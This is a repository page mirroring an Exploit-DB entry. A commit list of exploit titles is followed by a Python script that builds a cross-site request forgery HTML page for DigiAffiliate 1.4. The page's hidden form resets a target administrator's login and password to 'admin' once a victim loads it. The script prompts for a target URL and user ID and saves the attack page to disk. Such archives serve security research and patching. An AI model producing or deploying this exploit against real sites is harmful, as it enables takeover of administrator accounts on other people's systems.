bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/asp/webapps/42738.py
Offensive Security ef4c288da7 DB: 2017-09-19 
16 new exploits

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)
Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (1)

Cam2pc 4.6.2 - BMP Image Processing Integer Overflow
Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow
Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering Unspecified Buffer Overflow
Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering CMP Fencepost Denial of Service
Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Unspecified Buffer Overflow
Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering CMP Fencepost Denial of Service

Apple QuickTime 6.4/6.5/7.0.x - PictureViewer JPEG/PICT File Buffer Overflow
Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow

Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service
Tony Cook Imager 0.4x - '.JPEG' / '.TGA' Images Denial of Service

Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure
Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)
Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure
Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure

Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
Adobe Reader X 10.1.4.38 - '.BMP'/'.RLE' Heap Corruption

XV 3.x - BMP Parsing Local Buffer Overflow
XV 3.x - '.BMP' Parsing Local Buffer Overflow

Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)
Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)

GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized JPEG Image Access
GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized '.JPEG' Image Access

Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload (Metasploit)
Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)

XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution
XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution

Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection
Digirez 3.4 - Cross-Site Request Forgery (Update Admin)
Digileave 1.2 - Cross-Site Request Forgery (Update Admin)
DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass
iBall ADSL2+ Home Router - Authentication Bypass
Apache - HTTP OPTIONS Memory Leak
2017-09-19 05:01:33 +00:00

111 lines
No EOL
3.6 KiB
Python
Executable file
Raw Blame History

#!/usr/local/bin/python
# # # # #
# Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7
# Demo: http://www.digiappz.com/digiaffiliate/login.asp
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
DigiAffiliate 1.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digiaffiliate: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:220): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
Reference in a new issue View git blame Copy permalink